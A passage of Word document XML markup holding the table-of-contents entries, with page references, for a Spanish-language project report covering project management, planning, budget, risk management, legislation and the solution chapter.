            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>25</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="469263EA" w14:textId="1D459F2E" w:rsidR="00DB0E28" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170500153" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Capítulo 2: Gestión del proyecto</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500153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90FD0C3" w14:textId="7A7C4FA3" w:rsidR="00DB0E28" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170500154" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
            <w:noProof/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>2.1   ALCANCE DEL PROYECTO</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500154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6EC8B0FD" w14:textId="42A56526" w:rsidR="00DB0E28" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170500155" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
            <w:noProof/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>2.2   PLAN DE TRABAJO</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500155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243AC62F" w14:textId="6545A0B3" w:rsidR="00DB0E28" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170500156" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
            <w:noProof/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>2.2.1   Identificación de tareas</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500156 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>32</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7DD1BEAE" w14:textId="779A646E" w:rsidR="00DB0E28" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170500157" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
            <w:noProof/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>2.2.2   Estimación de tareas</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500157 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>33</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="728D0F98" w14:textId="36AF8F1F" w:rsidR="00DB0E28" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170500158" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
            <w:noProof/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>2.2.3   Planificación de tareas</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500158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289C3A20" w14:textId="415B0C12" w:rsidR="00DB0E28" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170500159" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
            <w:noProof/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>2.3   GESTIÓN DE RECURSOS</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500159 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>34</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0C6E9380" w14:textId="0CE732FA" w:rsidR="00DB0E28" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170500160" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
            <w:noProof/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>2.3.1   Especificación de recursos</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500160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091D5FFB" w14:textId="6399A42F" w:rsidR="00DB0E28" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170500161" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
            <w:noProof/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>2.3.2   Presupuesto</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500161 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>35</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="46F7E8CA" w14:textId="44BAE3C4" w:rsidR="00DB0E28" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170500162" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
            <w:noProof/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>2.4   GESTIÓN DE RIESGOS</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500162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2FAA6799" w14:textId="0FD57142" w:rsidR="00DB0E28" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170500163" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
            <w:noProof/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>2.4.1   Identificación de riesgos</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500163 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>38</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="375526BC" w14:textId="67C76293" w:rsidR="00DB0E28" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170500164" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
            <w:noProof/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>2.4.2   Análisis de riesgos</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500164 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>39</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="58BBBF14" w14:textId="50691EA4" w:rsidR="00DB0E28" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="960"/>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170500165" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
            <w:noProof/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>2.5</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:rFonts w:eastAsia="Calibri"/>
            <w:smallCaps w:val="0"/>
            <w:noProof/>
            <w:kern w:val="2"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
            <w:noProof/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>LEGISLACIÓN Y NORMATIVA</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500165 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>41</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="359E58BA" w14:textId="02F8863C" w:rsidR="00DB0E28" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170500166" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
            <w:noProof/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Capítulo 3: Solución</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500166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16BEB815" w14:textId="10206B82" w:rsidR="00DB0E28" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170500167" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
            <w:noProof/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>3.1   DESCRIPCIÓN DE LA SOLUCIÓN</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc170500167 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>44</w:t>
        </w:r>
        <w:r w:rsidR="00DB0E28">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2DA8AF4F" w14:textId="00357DA6" w:rsidR="00DB0E28" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8777"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc170500168" w:history="1">
        <w:r w:rsidR="00DB0E28" w:rsidRPr="00C15843">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
